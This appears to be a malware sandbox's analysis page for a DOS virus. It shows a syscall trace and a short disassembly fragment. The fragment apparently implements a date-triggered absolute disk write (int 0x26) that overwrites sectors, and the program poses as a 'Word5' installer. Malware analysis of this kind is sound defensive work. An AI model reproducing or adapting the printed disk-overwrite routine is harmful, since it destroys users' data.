Sample viewer

vx.netlux.org/Virus.DOS.Amz.789.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:58:00.685800005Z 26 PC: 12d52 | Set disk transfer address
2018-12-17T21:58:00.687333881Z 71 PC: 12d6d | Get current directory
2018-12-17T21:58:00.690003041Z 59 PC: 12d74 | Change current directory
2018-12-17T21:58:00.693766464Z 78 PC: 12d92 | Find first file
2018-12-17T21:58:00.699831757Z 78 PC: 12e23 | Find first file
2018-12-17T21:58:00.705267911Z 78 PC: 12e23 | Find first file
2018-12-17T21:58:00.715452259Z 59 PC: 12f94 | Change current directory
2018-12-17T21:58:00.724306122Z 42 PC: 12f98 | Get date 0x12f98: cmp dx, word ptr [0x3d1]
0x12f9c: jne 0x12fcc
0x12f9e: mov ah, 0x2c
0x12fa0: int 0x21
0x12fa2: cmp ch, byte ptr [0x3d3]
0x12fa6: jb 0x12fcc
0x12fa8: mov cx, 0xc8
0x12fab: xor dx, dx
0x12fad: mov al, 0x19
0x12faf: cmp al, 1
0x12fb1: jne 0x12fb5
0x12fb3: xor al, al
0x12fb5: cmp al, 0xff
0x12fb7: jne 0x12fbb
0x12fb9: mov al, 1
0x12fbb: push ax
0x12fbc: push cx
0x12fbd: int 0x26
0x12fbf: add sp, 2
0x12fc2: pop cx
2018-12-17T21:58:00.726706115Z 25 PC: 12a48 | Get default drive
2018-12-17T21:58:00.728680534Z 9 PC: 12a5e | Display string (String= ' �������������������������ͻ � Installazione di Word5 � � by Stefano 1990 � �������������������������ͼ Installa o Disinstalla (dalla corrente directory) ? >')
2018-12-17T21:58:00.739647849Z 1 PC: 12a62 | Character input